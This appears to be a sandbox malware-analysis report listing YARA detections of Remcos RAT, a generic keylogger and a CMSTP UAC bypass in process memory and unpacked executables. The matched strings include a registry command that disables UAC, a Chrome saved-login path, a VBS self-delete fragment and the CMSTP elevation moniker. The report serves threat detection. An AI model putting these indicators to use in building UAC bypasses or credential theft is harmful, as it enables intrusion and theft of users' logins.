Process Memory Space: explorer.exe PID: 1180	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: explorer.exe PID: 1180	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: explorer.exe PID: 1180	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: explorer.exe PID: 1180	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x93bb5:$a1: Remcos restarted by watchdog! 0x9410f:$a3: %02i:%02i:%02i:%03i 0x9453e:$a3: %02i:%02i:%02i:%03i
Click to see the 70 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
20.2.cmd.exe.4fb0b57.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.cmd.exe.4fb0b57.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcbe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd49:$s1: CoGetObject 0x1dca2:$s2: Elevation:Administrator!new:
32.2.explorer.exe.55bfb57.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
32.2.explorer.exe.55bfb57.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcbe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd49:$s1: CoGetObject 0x1dca2:$s2: Elevation:Administrator!new:
24.2.cmd.exe.52ba757.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
24.2.cmd.exe.52ba757.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0be:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d149:$s1: CoGetObject 0x1d0a2:$s2: Elevation:Administrator!new:
14.2.cmd.exe.5573a8a.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
14.2.cmd.exe.5573a8a.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62d8b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e16:$s1: CoGetObject 0x62d6f:$s2: Elevation:Administrator!new:
12.2.DZIPR.exe.35e05ce.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
12.2.DZIPR.exe.35e05ce.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0be:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d149:$s1: CoGetObject 0x1d0a2:$s2: Elevation:Administrator!new:
22.2.explorer.exe.4a68a8a.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
22.2.explorer.exe.4a68a8a.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62d8b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e16:$s1: CoGetObject 0x62d6f:$s2: Elevation:Administrator!new:
12.2.DZIPR.exe.359a901.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
12.2.DZIPR.exe.359a901.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62d8b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e16:$s1: CoGetObject 0x62d6f:$s2: Elevation:Administrator!new:
20.2.cmd.exe.55000c8.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
20.2.cmd.exe.55000c8.7.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
20.2.cmd.exe.55000c8.7.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.cmd.exe.55000c8.7.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
20.2.cmd.exe.55000c8.7.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
20.2.cmd.exe.55000c8.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
14.2.cmd.exe.5ff00c8.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
14.2.cmd.exe.5ff00c8.7.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
14.2.cmd.exe.5ff00c8.7.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
14.2.cmd.exe.5ff00c8.7.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
14.2.cmd.exe.5ff00c8.7.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
14.2.cmd.exe.5ff00c8.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
14.2.cmd.exe.55b8b57.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
14.2.cmd.exe.55b8b57.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcbe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd49:$s1: CoGetObject 0x1dca2:$s2: Elevation:Administrator!new:
32.2.explorer.exe.55c0757.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
32.2.explorer.exe.55c0757.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0be:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d149:$s1: CoGetObject 0x1d0a2:$s2: Elevation:Administrator!new:
28.2.cmd.exe.57d00c8.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
28.2.cmd.exe.57d00c8.7.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.2.cmd.exe.57d00c8.7.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
28.2.cmd.exe.57d00c8.7.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
28.2.cmd.exe.57d00c8.7.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
28.2.cmd.exe.57d00c8.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
14.2.cmd.exe.5ff00c8.7.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
14.2.cmd.exe.5ff00c8.7.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
14.2.cmd.exe.5ff00c8.7.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
14.2.cmd.exe.5ff00c8.7.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690b8:$a1: Remcos restarted by watchdog! 0x69630:$a3: %02i:%02i:%02i:%03i
14.2.cmd.exe.5ff00c8.7.unpack	REMCOS_RAT_variants	unknown	unknown	0x6310c:$str_a1: C:\Windows\System32\cmd.exe 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6317c:$str_b2: Executing file: 0x641fc:$str_b3: GetDirectListeningPort 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d28:$str_b7: \update.vbs 0x631a4:$str_b9: Downloaded file: 0x63190:$str_b10: Downloading file: 0x63234:$str_b12: Failed to upload file: 0x641c4:$str_b13: StartForward 0x641e4:$str_b14: StopForward 0x63c80:$str_b15: fso.DeleteFile " 0x63c14:$str_b16: On Error Resume Next 0x63cb0:$str_b17: fso.DeleteFolder " 0x63224:$str_b18: Uploaded file: 0x631e4:$str_b19: Unable to delete: 0x63c48:$str_b20: while fso.FileExists(" 0x636c1:$str_c0: [Firefox StoredLogins not found]
14.2.cmd.exe.5ff00c8.7.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62ff8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f8c:$s1: CoGetObject 0x62fa0:$s1: CoGetObject 0x62fbc:$s1: CoGetObject 0x6cf5e:$s1: CoGetObject 0x62f4c:$s2: Elevation:Administrator!new:
22.2.explorer.exe.4aae757.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
22.2.explorer.exe.4aae757.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0be:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d149:$s1: CoGetObject 0x1d0a2:$s2: Elevation:Administrator!new:
26.2.explorer.exe.cc8b57.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
26.2.explorer.exe.cc8b57.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcbe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd49:$s1: CoGetObject 0x1dca2:$s2: Elevation:Administrator!new:
24.2.cmd.exe.58300c8.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
24.2.cmd.exe.58300c8.7.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
24.2.cmd.exe.58300c8.7.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
24.2.cmd.exe.58300c8.7.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
24.2.cmd.exe.58300c8.7.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
28.2.cmd.exe.57d00c8.7.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
28.2.cmd.exe.57d00c8.7.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.2.cmd.exe.57d00c8.7.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
24.2.cmd.exe.58300c8.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
28.2.cmd.exe.57d00c8.7.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690b8:$a1: Remcos restarted by watchdog! 0x69630:$a3: %02i:%02i:%02i:%03i
28.2.cmd.exe.57d00c8.7.unpack	REMCOS_RAT_variants	unknown	unknown	0x6310c:$str_a1: C:\Windows\System32\cmd.exe 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6317c:$str_b2: Executing file: 0x641fc:$str_b3: GetDirectListeningPort 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d28:$str_b7: \update.vbs 0x631a4:$str_b9: Downloaded file: 0x63190:$str_b10: Downloading file: 0x63234:$str_b12: Failed to upload file: 0x641c4:$str_b13: StartForward 0x641e4:$str_b14: StopForward 0x63c80:$str_b15: fso.DeleteFile " 0x63c14:$str_b16: On Error Resume Next 0x63cb0:$str_b17: fso.DeleteFolder " 0x63224:$str_b18: Uploaded file: 0x631e4:$str_b19: Unable to delete: 0x63c48:$str_b20: while fso.FileExists(" 0x636c1:$str_c0: [Firefox StoredLogins not found]
28.2.cmd.exe.57d00c8.7.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62ff8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f8c:$s1: CoGetObject 0x62fa0:$s1: CoGetObject 0x62fbc:$s1: CoGetObject 0x6cf5e:$s1: CoGetObject 0x62f4c:$s2: Elevation:Administrator!new:
33.2.explorer.exe.474ab57.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
33.2.explorer.exe.474ab57.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcbe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd49:$s1: CoGetObject 0x1dca2:$s2: Elevation:Administrator!new:
28.2.cmd.exe.5199a8a.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
28.2.cmd.exe.5199a8a.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62d8b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e16:$s1: CoGetObject 0x62d6f:$s2: Elevation:Administrator!new:
28.2.cmd.exe.51deb57.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
28.2.cmd.exe.51deb57.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcbe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd49:$s1: CoGetObject 0x1dca2:$s2: Elevation:Administrator!new:
20.2.cmd.exe.4f6ba8a.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.cmd.exe.4f6ba8a.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62d8b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e16:$s1: CoGetObject 0x62d6f:$s2: Elevation:Administrator!new:
33.2.explorer.exe.4705a8a.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
33.2.explorer.exe.4705a8a.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62d8b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e16:$s1: CoGetObject 0x62d6f:$s2: Elevation:Administrator!new:
24.2.cmd.exe.52b9b57.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
24.2.cmd.exe.52b9b57.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcbe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd49:$s1: CoGetObject 0x1dca2:$s2: Elevation:Administrator!new:
22.2.explorer.exe.4aadb57.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
22.2.explorer.exe.4aadb57.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcbe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd49:$s1: CoGetObject 0x1dca2:$s2: Elevation:Administrator!new:
32.2.explorer.exe.557aa8a.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
32.2.explorer.exe.557aa8a.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62d8b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e16:$s1: CoGetObject 0x62d6f:$s2: Elevation:Administrator!new:
12.2.DZIPR.exe.35df9ce.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
12.2.DZIPR.exe.35df9ce.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcbe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd49:$s1: CoGetObject 0x1dca2:$s2: Elevation:Administrator!new:
20.2.cmd.exe.4fb1757.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.cmd.exe.4fb1757.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0be:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d149:$s1: CoGetObject 0x1d0a2:$s2: Elevation:Administrator!new:
24.2.cmd.exe.5274a8a.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
24.2.cmd.exe.5274a8a.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62d8b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e16:$s1: CoGetObject 0x62d6f:$s2: Elevation:Administrator!new:
20.2.cmd.exe.55000c8.7.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
20.2.cmd.exe.55000c8.7.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
20.2.cmd.exe.55000c8.7.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.cmd.exe.55000c8.7.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690b8:$a1: Remcos restarted by watchdog! 0x69630:$a3: %02i:%02i:%02i:%03i
20.2.cmd.exe.55000c8.7.unpack	REMCOS_RAT_variants	unknown	unknown	0x6310c:$str_a1: C:\Windows\System32\cmd.exe 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6317c:$str_b2: Executing file: 0x641fc:$str_b3: GetDirectListeningPort 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d28:$str_b7: \update.vbs 0x631a4:$str_b9: Downloaded file: 0x63190:$str_b10: Downloading file: 0x63234:$str_b12: Failed to upload file: 0x641c4:$str_b13: StartForward 0x641e4:$str_b14: StopForward 0x63c80:$str_b15: fso.DeleteFile " 0x63c14:$str_b16: On Error Resume Next 0x63cb0:$str_b17: fso.DeleteFolder " 0x63224:$str_b18: Uploaded file: 0x631e4:$str_b19: Unable to delete: 0x63c48:$str_b20: while fso.FileExists(" 0x636c1:$str_c0: [Firefox StoredLogins not found]
20.2.cmd.exe.55000c8.7.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62ff8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f8c:$s1: CoGetObject 0x62fa0:$s1: CoGetObject 0x62fbc:$s1: CoGetObject 0x6cf5e:$s1: CoGetObject 0x62f4c:$s2: Elevation:Administrator!new:
26.2.explorer.exe.cc9757.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
